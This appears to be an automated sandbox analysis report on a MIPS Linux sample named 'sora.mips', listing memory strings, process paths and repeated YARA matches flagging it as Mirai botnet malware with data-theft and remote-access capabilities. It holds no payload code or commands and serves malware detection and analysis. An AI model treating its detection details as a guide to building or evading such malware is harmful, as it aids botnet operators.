Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6218.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6220.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6221.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6418.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6227.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6229.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6412.1.00007ffecd533000.00007ffecd554000.rw-.sdmp, sora.mips, 6414.1.00007ffecd533000.00007ffecd554000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./sora.mipsthinkphpSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/usr/bin./sora.mips
Source: sh, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6218.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6220.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6221.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6418.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6227.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6229.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6412.1.00005651e0f68000.00005651e0fef000.rw-.sdmp, sora.mips, 6414.1.00005651e0f68000.00005651e0fef000.rw-.sdmp	Binary or memory string: QVGeneralNames!/etc/qemu-binfmt/mips
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd (deleted)
Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV/mips/0 /proc/1622/fd/9!/proc/1890/fd/34mips/pr1/proc/2028/fd/9/mips/0!/proc/1623/exe!/proc/1890/fd/33mips/pr1/proc/2079/fd/5/mips/0!/proc/1623/fd!/proc/1890/fd/32mips/pr1/proc/2028/fd/10mips/0!/proc/1623/fd/.!/proc/1890/fd/31mips/pr1/usr/bin/qemu-mips (deleted)0!/proc/1623/fd/..!/proc/1890/fd/30mips/pr1/proc/2028/fd/11mips/0!/proc/1623/fd/0!/proc/1890/fd/29mips/pr1/proc/2079/fd/4/mips/0!/proc/1623/fd/1!/proc/1890/fd/28mips/pr1/proc/2028/fd/13mips/0!/proc/1623/fd/2!/proc/1890/fd/27mips/pr1/proc/6224/exe/mips/0!/proc/1623/fd/3!/proc/1890/fd/26mips/pr1/proc/2033/exe/mips/0!/proc/1623/fd/4!/proc/1890/fd/25mips/pr1/proc/2079/fd/3/mips/0!/proc/1623/fd/5!/proc/1890/fd/24mips/pr1/proc/2033/fd/mips/0!/proc/1623/fd/6!/proc/1890/fd/23mips/pr1`0

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY

ID:	1431999
Product:	CloudBasic
Start time:	08:31:36
Start date:	26.04.2024
Cookbook:	defaultlinuxcmdlinecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Malware Threat Intel
Provided by